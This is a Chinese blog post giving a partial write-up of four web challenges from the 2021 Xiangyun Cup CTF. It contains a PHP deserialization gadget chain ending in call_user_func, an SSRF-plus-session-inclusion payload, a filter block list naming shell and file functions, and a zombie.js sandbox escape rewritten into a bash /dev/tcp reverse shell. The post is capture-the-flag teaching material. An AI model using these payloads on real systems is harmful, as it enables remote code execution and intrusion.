2021祥云杯web 部分wp

最新推荐文章于 2021-10-07 13:14:11 发布
最新推荐文章于 2021-10-07 13:14:11 发布
阅读量788 收藏 3
点赞数 3
分类专栏: ctfwp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/119871411
版权

ezyii

说是最新的链子,题目把文件都筛选好了让我们找。写一下我的思路
看到RunProcess类

<?php


namespace Codeception\Extension;


class RunProcess
{
    protected $output;
    protected $config = ['sleep' => 0];

    protected static $events = [];

    private $processes = [];
    public function __destruct()
    {
        $this->stopProcess();
    }

    public function stopProcess()
    {
        foreach (array_reverse($this->processes) as $process) {

            if (!$process->isRunning()) {
                continue;
            }
            $this->output->debug('[RunProcess] Stopping ' . $process->getCommandLine());
            $process->stop();
        }
        $this->processes = [];
    }
}

底下有个字符串拼接,可以触发__toString,全局搜索__toString
在这里插入图片描述

AppendStream下有__toString 并且调用了rewind(),找找看这个rewind
在这里插入图片描述
CachingStream类这里有,并且还调用了seek方法,seek又调用了read方法,在这个read方法里又调用了一个read方法

在这里插入图片描述
我们可以控制$this->stream为我们想要的类,查找read,最后在PumpStream类里

<?php


namespace GuzzleHttp\Psr7;


class PumpStream
{
    private $source;

    private $size;

    private $tellPos = 0;

    private $metadata;


    private $buffer;

    public function getSize()
    {
        return $this->size;
    }
    public function read($length)
    {
        $data = $this->buffer->read($length);
        $readLen = strlen($data);
        $this->tellPos += $readLen;
        $remaining = $length - $readLen;

        if ($remaining) {
            $this->pump($remaining);
            $data .= $this->buffer->read($remaining);
            $this->tellPos += strlen($data) - $readLen;
        }

        return $data;
    }
    private function pump($length)
    {
        if ($this->source) {
            do {
                $data = call_user_func($this->source, $length);
                if ($data === false || $data === null) {
                    $this->source = null;
                    return;
                }
                $this->buffer->write($data);
                $length -= strlen($data);
            } while ($length > 0);
        }
    }
}

这个类有read方法 ,read调用了pump pump方法调用了call_user_func,所以可以RCE

就写到这吧 我把链子找完的时候队友已经出了,还告诉我网上有公开的poc,心累,说好的最新呢

安全检测

在这里插入图片描述
检测127.0.0.1成功了 是ssrf,利用ssrf扫路径扫到了http://127.0.0.1/admin/include123.php
源码

<?php 
$u=$_GET['u']; 

$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where"; 
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert"; 
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore"; 
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr"; 
$pattern .="|file|dict|gopher"; 
//累了累了,饮茶先 

$vpattern = explode("|",$pattern); 

foreach($vpattern as $value){     
    if (preg_match( "/$value/i", $u )){ 
        echo "检测到恶意字符"; 
        exit(0); 
    } 
} 

include($u); 


show_source(__FILE__); 
?>

包含一下session文件呗
payload:

http://127.0.0.1/admin/include123.php?u=/tmp/sess_你的PHPSESSID&payload=<?=\`cat\t/getf???.sh`?>
成功了 挺奇怪的 源码里ban了反引号我这里却可以用 不管了 flag出了就行。

层层穿透

这题做了好久,只会一点java的我靠着github上的一键shell poc做完了
第一层反弹shell,github有直接可以利用的工具
在这里插入图片描述

弹个shell到自己的vps上。
题目提示内网
信息搜集到了10.10.1.11:8080,估计是内网web环境,先把附件源码反编译一下,因为题目环境20分钟刷新一次,所以现在本地打
对着源码逻辑先登录,账号密码源码里可以直接找到
在这里插入图片描述

看到admin/test路由存在fastjson反序列化点。
不怎么会java反序列化,但是github上有不出网直接在数据包里回显的一键shellpoc
https://github.com/depycode/fastjson-c3p0
照着github上的readme直接打,发现提示太短,看源码
在这里插入图片描述
把poc复制两边再打就打通了
本地打通了,之后是题目。我花了大部分时间在搞代理 有几个小时吧 最后选择了frp 确实方便
frp教程
端口转发成功后按照刚刚本地的步骤直接打就行
在这里插入图片描述
(一定找个时间好好学java)

Crawer_z

在这里插入图片描述
引用了zombie框架,谷歌查找 全网只找到这个框架一篇漏洞
https://ha.cker.in/index.php/Article/13563
漏洞描述
在这里插入图片描述
攻击者可以在他们的页面中插入JS代码来利用zombiejs代码注入漏洞。如果使用zombiejs 抓取此类页面,则运行爬虫的机器将运行攻击者提供的任意命令。为了比较,jsdom 默认禁用脚本执行。

想办法让题目访问我们准备的恶意页面就行。
payload在这个博客里都准备好了,提取一下

var codeToExec = "var sync=require('child_process').spawnSync; " +
    "var ls = sync('cat', ['./resources/test.html']); console.log(ls.output.toString());";
var exploit = "c='constructor';require=this[c][c]('return process')().mainModule.require;" + codeToExec;
var attackVector = "c='constructor';this[c][c](\"" + exploit + "\")()";
console.log(attackVector)

改成弹shell的

c='constructor';this[c][c]("c='constructor';require=this[c][c]('return process')().mainModule.require;var sync=require('child_process').spawnSync; var ls = sync('bash', ['-c','bash -i >& /dev/tcp/ip/port 0>&1'],); console.log(ls.output.toString());")()

有了payload,我们要想办法让题目访问我们的恶意页面。看一下源码。
在user.js下
在这里插入图片描述
看到访问/user/bucket似乎会自动访问我们个人信息里设置的bucket,尝试访问。
在这里插入图片描述
尝试更改bucket设置,先看源码
在这里插入图片描述
在checkBucket函数下,看到bucket的要求,必须以http:或者https:为开头,且必须包含oss-cn-beijing.ichunqiu.com
我们尝试修改前面为自己的vps地址
在这里插入图片描述
点击更新
在这里插入图片描述

变回原来的了,并且提示admin会来检查,但在源码里看到
在这里插入图片描述
这里其实算是更改失败了,admin不会去检查
在这里插入图片描述
源码里有个重定向到
/user/verify?token=${authToken},我们尝试用队伍token
浏览器url输入队伍token
在这里插入图片描述
修改bucket,但不要点击update,直接在访问我们放入队伍token后的url
在这里插入图片描述
提示更改成功 看到我们的bucket也被设置成了我们的vps地址
其实这里我还没怎么懂原理,只是试了一下发现可以,那就歪打正着直接用。
在这里插入图片描述
再访问/user/bucket
在这里插入图片描述
回显的内容变了,报错404,这是因为我的vps上没有oss-cn-beijing.ichunqiu.com这个文件。
到这里思路就很清晰了,我们在vps上放置一个oss-cn-beijing.ichunqiu.com.html恶意文件,然后修改bucket为http://公网ip地址/oss-cn-beijing.ichunqiu.com.html
并且这个html文件已经被我们插入了用<script>标签包裹的恶意payload
在这里插入图片描述
服务器起个监听
在这里插入图片描述
题目内访问/user/bucket
在这里插入图片描述
在这里插入图片描述
弹成功了。

这次比赛就做了这四道题,做完java那题距比赛结束就1小时了,被队友带飞进了前三十 队友们tql

fmyyy1
关注
专栏目录
WP-2021祥云
ce666666的博客
01-16 684
前言 好多审计题,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的题目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这题就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4343
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
[祥云2021Wp]
qq_42906381的博客
08-24 415
MISC新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语
祥云2021 Web复现
feng的博客
08-25 1907
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
2021祥云部分wp
m0_51357657的博客
08-24 905
祥云2021 目前只做了两道题(没办法 tcl。。。 MISC-鸣雏恋 下载下来是个word,打开只有一句话 不太对劲,放到010里看一看发现文件头50 4B 03 04 经典压缩包了,文件后缀改成zip,解压 得到一个txt和加密压缩包,文件打开感觉什么都没有。。。 但仔细看,第二行可显示字符没有190,所以是零宽度字符隐写 vim 一下,果然 放到在线网站上解一下 压缩包解完有129488张图片,两种图片代表01,转成二进制 二进制转换成ASCII码之后,发现是个base64转png 接下
【pwn】2021 祥云部分
woodwhale的博客
10-07 4229
【pwn】2021 祥云部分) 前言 国庆的最后几天,一直在补题,发现祥云那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
祥云2021web writeup
hezhing
08-27 3398
太菜了,一个web都没做出来。接下来是复现。好好学习一下大佬们的姿势,也记录一下。 参考师傅们的wp,网上有的,侵权删。
祥云2021题目汇总 祥云.7z
08-31
祥云2021题目汇总 祥云.7z
[ctf misc][2021祥云初赛]层层取证
ShenZ的博客
08-23 2628
呜呜写博客以来第一次线上做出题目了 [2021祥云初赛]层层取证 附件: Forensic_9b23172e1dba502daa656b8d4234897f.rar 内含win7x64电脑镜像和内存镜像disk_image.rar,memdump.rar 1.初步分析 disk_image 首先取证大师 得到xiaoming用户NT密码哈希值:92efa7f9f2740956d51157f46521f941,cmd5网站在线解密(是付费的) 在xiaoming账户的桌面上可以看到叫flag.txt
首届祥云网络安全大赛 web wp
Firebasky的博客
11-24 940
和团队一起打了祥云,感觉还是可以的,师傅们太强了~ 自己也学习了不少继续加油~ 链接:https://pan.baidu.com/s/1WKE8UhFaKajEuaIM772aRw 提取码:93um 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
祥云2021 Web简单题wp
feng的博客
08-23 604
前言 千言万语汇成一句:我真是太菜了。事实证明只会个php在卷成这样的ctf比赛里面只能挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打。 不会Java和js直接下线,只能卑微的做最简单题
2021 祥云 RE dizzy WP
AlwaysBetter
08-28 372
这道题 其实是一道模拟题 作者估计也没想到 被hexRay背刺了 大概思想是模拟了 加 减 异或三种运算 可惜模拟的子片段能被hexRay识别并分析,导致把maxFunSize参数上限调高后,ida直接把运算式生成了: byte_43841C[6] += byte_43841C[3]; byte_43841C[10] -= byte_43841C[27]; byte_43841C[10] += byte_43841C[6]; byte_43841C[14] += byte_43841C[3]; byte_
2021祥云 CTF pwn解 wp
qq_39948058的博客
08-26 1224
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
祥云“-Web-Command
weixin_44732566的博客
11-24 423
祥云”-Web-Command 这题考查的是命令注入,测试了一下,过滤了空格,&,$,单引号,>等,但是没有过滤管道符 | payload:?url=127.0.0.1|pwd。可以得到当前路径/var/www/html 之后测试,发现过滤了cat,index,php,通过双引号绕过;<绕过空格。 payload:?url=127.0.0.1|ca"t"<in"d"ex."p"hp 得到源代码 <?php error_reporting(0); if (isset($
[2021祥云]cralwer_z
cjdgg的博客
09-09 1116
[2021祥云]cralwer_z 这题我在buu上做的,直接给源代码了,不知道比赛时是不是也这样 这个文件的目录就是这些东西,还是js代码,有点烦,话不多说,审代码还是正常的从路由开始审起吧.这里提一下,我审代码喜欢先看各个路由,然后找危险函数,逆着去找利用链,我觉得这样的查找效果较好 先看index.js的,这里的就是简单的注册代码,没啥可以利用的 接下来看一看user.js吧 我审js代码也不是很多,也不知道有啥危险函数可以执行系统命令或者是读取文件,就去网上搜了一下,基本上都是php的,估计这
BUUCTF刷题记录(6)
bmth666的博客
05-14 7641
文章目录web[FBCTF2019]RCEService webctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
PHP代码审计Day1题解
洋洋的小黑屋
01-07 434
题目来源先知社区红日安全中的day1 //index.php <?php include 'config.php'; $conn = new mysqli($servername, $username, $password, $dbname); if ($conn->connect_error) { die("连接失败: "); } $sql = "SELECT COUN...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值